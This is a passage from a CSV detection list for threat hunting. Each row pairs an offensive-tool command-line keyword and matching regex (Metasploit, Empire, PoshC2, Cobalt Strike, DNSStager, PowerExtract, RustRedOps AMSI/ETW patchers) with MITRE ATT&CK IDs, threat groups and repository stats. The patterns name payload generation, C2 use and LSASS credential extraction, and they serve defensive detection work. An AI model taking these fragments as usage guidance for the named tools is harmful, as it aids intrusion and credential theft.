Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "* patch_amsi.exe*",".{0,1000}\spatch_amsi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* patch_etw.exe*",".{0,1000}\spatch_etw\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* path-mtu.nse*",".{0,1000}\spath\-mtu\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -pathToBloodHoundGraph * -pathToOutputGoFetchPath * -pathToAdditionalPayload *",".{0,1000}\s\-pathToBloodHoundGraph\s.{0,1000}\s\-pathToOutputGoFetchPath\s.{0,1000}\s\s\-pathToAdditionalPayload\s.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","620","139","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "* -PathToDMP *.dmp*",".{0,1000}\s\-PathToDMP\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. 
It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","0","N/A","N/A","2","106","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" "* -PathToGraph *.json -PathToPayload *.exe*",".{0,1000}\s\-PathToGraph\s.{0,1000}\.json\s\-PathToPayload\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","620","139","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "* -Payload * -method sysprep*",".{0,1000}\s\-Payload\s.{0,1000}\s\-method\ssysprep.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "* --payload * --platform windows*",".{0,1000}\s\-\-payload\s.{0,1000}\s\-\-platform\swindows.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "* --payload * --shellcode_path * --xorkey *",".{0,1000}\s\-\-payload\s.{0,1000}\s\-\-shellcode_path\s.{0,1000}\s\-\-xorkey\s.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "* -payload *-Lhost *-Lport*",".{0,1000}\s\-payload\s.{0,1000}\-Lhost\s.{0,1000}\-Lport.{0,1000}","offensive_tool_keyword","empire","Empire scripts arguments. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* payload add *",".{0,1000}\spayload\sadd\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "* --payload CommonsCollections*",".{0,1000}\s\-\-payload\sCommonsCollections.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - 
T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "* payload start *",".{0,1000}\spayload\sstart\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "* --payload x64/c/ipv6 *",".{0,1000}\s\-\-payload\sx64\/c\/ipv6\s.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "* --payload_file * --payload_path*",".{0,1000}\s\-\-payload_file\s.{0,1000}\s\-\-payload_path.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","0","Added to cover the POC exploitation used in massive ransomware campaign that exploits public facing VMware ESXi product 
","N/A","2","150","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" "* payload_placement.exe*",".{0,1000}\spayload_placement\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* --payloadcookie *",".{0,1000}\s\-\-payloadcookie\s.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","0","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "* --payload-file pwn.bat*",".{0,1000}\s\-\-payload\-file\spwn\.bat.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","0","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "* -PayloadPath *",".{0,1000}\s\-PayloadPath\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BypassUAC.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* PayloadsDirectory*",".{0,1000}\sPayloadsDirectory.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "* payloadtests.py*",".{0,1000}\spayloadtests\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "* PayloadType.BIND_TCP*",".{0,1000}\sPayloadType\.BIND_TCP.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "* --payload-types all*",".{0,1000}\s\-\-payload\-types\sall.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* --payload-types bin*",".{0,1000}\s\-\-payload\-types\sbin.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* --payload-types dll*",".{0,1000}\s\-\-payload\-types\sdll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* --payload-types exe*",".{0,1000}\s\-\-payload\-types\sexe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* --payload-types ps1*",".{0,1000}\s\-\-payload\-types\sps1.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* --payload-types py*",".{0,1000}\s\-\-payload\-types\spy.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* --payload-types svc.exe*",".{0,1000}\s\-\-payload\-types\ssvc\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* --payload-types vbs*",".{0,1000}\s\-\-payload\-types\svbs.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* pcanywhere-brute.nse*",".{0,1000}\spcanywhere\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* pcworx-info.nse*",".{0,1000}\spcworx\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* pdf2john.py*",".{0,1000}\spdf2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* -PE_Clone *",".{0,1000}\s\-PE_Clone\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "* 
